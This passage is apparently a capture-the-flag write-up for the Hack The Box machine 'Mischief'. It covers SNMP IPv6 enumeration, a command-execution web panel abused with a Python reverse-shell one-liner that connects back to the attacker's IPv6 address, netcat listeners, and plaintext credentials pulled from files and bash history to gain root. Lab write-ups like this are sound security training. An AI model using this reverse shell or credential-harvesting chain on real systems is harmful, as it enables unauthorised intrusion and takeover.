|   zerofree-1.0.4-1; 0-01-01T00:00:00
|_  zlib1g-1:1.2.11.dfsg-0ubuntu2; 0-01-01T00:00:00
Service Info: Host: Mischief

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 114.55 seconds

Here I found something very interesting: the process list exposes what looks like the login credential for the HTTP service on port 3366.

Let’s navigate to port 3366 in the web browser and enter the following credential.

Username: loki
Password: godofmischiefisloki

We are greeted by the following web page, which holds another credential. Let’s find another place where this credential can be used to log in.

We use a Python script called Enyx to find the IPv6 address of the target machine over SNMP. You can get the script from GitHub, as cloned below.

root@kali:/opt# git clone https://github.com/trickster0/Enyx.git
Cloning into 'Enyx'...
remote: Enumerating objects: 70, done.
remote: Total 70 (delta 0), reused 0 (delta 0), pack-reused 70
Unpacking objects: 100% (70/70), done.
root@kali:/opt# cd Enyx/
root@kali:/opt/Enyx# python enyx.py 2c public 10.10.10.92
###################################################################################
#                          SNMP IPv6 Enumerator Tool                              #
#                  Author: Thanasis Tserpelis aka Trickster0                      #
###################################################################################


[+] Snmpwalk found.
Created directory: /var/lib/snmp/mib_indexes
[+] Grabbing IPv6.
[+] Loopback -> 0000:0000:0000:0000:0000:0000:0000:0001
[+] Unique-Local -> dead:beef:0000:0000:0250:56ff:feb9:801c
[+] Link Local -> fe80:0000:0000:0000:0250:56ff:feb9:801c
root@kali:/opt/Enyx#
root@kali:/opt/Enyx# nmap -6 dead:beef:0000:0000:0250:56ff:feb9:801c
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-01 03:07 EDT
Nmap scan report for dead:beef::250:56ff:feb9:801c
Host is up (0.034s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 17.38 seconds

We browse to the target’s IPv6 address, which presents a login page for a command execution panel. We try the credential found earlier, but it is not valid here.

Access Victim’s Shell

Next I brute-force the username and successfully log in with the following combination:

Since this is a command execution panel where we can run arbitrary system commands, it is an RCE that can be exploited to obtain a reverse shell on the target machine.

But first we need the IPv6 address of our local machine to use as the listening address.

root@kali:/opt/Enyx# ifconfig tun0
tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
inet 10.10.14.20 netmask 255.255.254.0 destination 10.10.14.20
inet6 dead:beef:2::1012 prefixlen 64 scopeid 0x0<global>
inet6 fe80::e0da:8b68:3f37:f906 prefixlen 64 scopeid 0x20<link>
unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 100 (UNSPEC)
RX packets 131 bytes 61874 (60.4 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 168 bytes 16553 (16.1 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

For the reverse shell I use the Python reverse shell from pentestmonkey, switching the socket to IPv6 and setting the host to our IPv6 address. Since both ends talk IPv6, we need a listener that accepts IPv6 connections, such as ncat, so we start ncat listening on port 443:

root@kali:~/htb/mischief# nc -6 -lvnp 443
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Connection from dead:beef::250:56ff:feb9:801c.
Ncat: Connection from dead:beef::250:56ff:feb9:801c:42176.
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ python3 -c "import pty; pty.spawn('/bin/bash')" 
www-data@Mischief:/var/www/html$

The Python reverse shell one-liner:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::1012",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

As soon as we execute the Python code, we get a reverse connection on ncat, or on nc6.exe from https://www.sphinx-soft.com/tools/index.html.

Great! We now have a remote shell, so let’s find user.txt to complete the first task. The file is in /home/loki, but we cannot read it. There is, however, another interesting file, “credentials”, which holds another credential.

c:\PENTEST>nc6 -lvp 443
listening on [::] 443 ...
Warning: forward host lookup failed for mischief.htb: h_errno 11004: NO_DATA
connect to [dead:beef:2::1012] from mischief.htb [dead:beef::250:56ff:feb9:801c] 42174: NO_DATA
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ python3 -c "import pty; pty.spawn('/bin/bash')"
www-data@Mischief:/var/www/html$ cd /home/loki
cd /home/loki
www-data@Mischief:/home/loki$ ls
ls
credentials hosted user.txt
www-data@Mischief:/home/loki$ cat credentials
cat credentials
pass: lokiisthebestnorsegod

Since port 22 is open, we connect to the remote machine over SSH and read user.txt.

PS C:\Users\jacco> ssh loki@10.10.10.92
loki@10.10.10.92's password:lokiisthebestnorsegod
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-20-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Tue Apr 2 07:20:54 UTC 2019

System load: 0.0 Processes: 115
Usage of /: 25.9% of 15.68GB Users logged in: 0
Memory usage: 43% IP address for ens33: 10.10.10.92
Swap usage: 0%


* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch

0 packages can be updated.
0 updates are security updates.


Last login: Mon Apr 1 06:40:22 2019 from 10.10.14.20
loki@Mischief:~$ ls
credentials hosted user.txt
loki@Mischief:~$ cat user.txt
bf5*****060
loki@Mischief:~$ cat .bash_history
python -m SimpleHTTPAuthServer loki:lokipasswordmischieftrickery
exit
free -mt
ifconfig
cd /etc/
sudo su
su
exit
su root
ls -la
sudo -l
ifconfig
id
cat .bash_history
nano .bash_history
exit
find / -name root.txt
whoami
groups
su
exit
loki@Mischief:~$ su
-bash: /bin/su: Permission denied

Exploring further, I found a .bash_history file containing one more credential for the root user, but loki does not have permission to execute su.

So we go back to the www-data shell, run su and enter the password found above to become root. root.txt inside the root directory did not hold the flag, so we use find to locate root.txt.

www-data@Mischief:/var/www/html$ su
su
Password: lokipasswordmischieftrickery

root@Mischief:/var/www/html# find / -name root.txt
find / -name root.txt
/usr/lib/gcc/x86_64-linux-gnu/7/root.txt
/root/root.txt
root@Mischief:/var/www/html# cat /usr/lib/gcc/x86_64-linux-gnu/7/root.txt
cat /usr/lib/gcc/x86_64-linux-gnu/7/root.txt
ae1*****807

Author: Jacco Straathof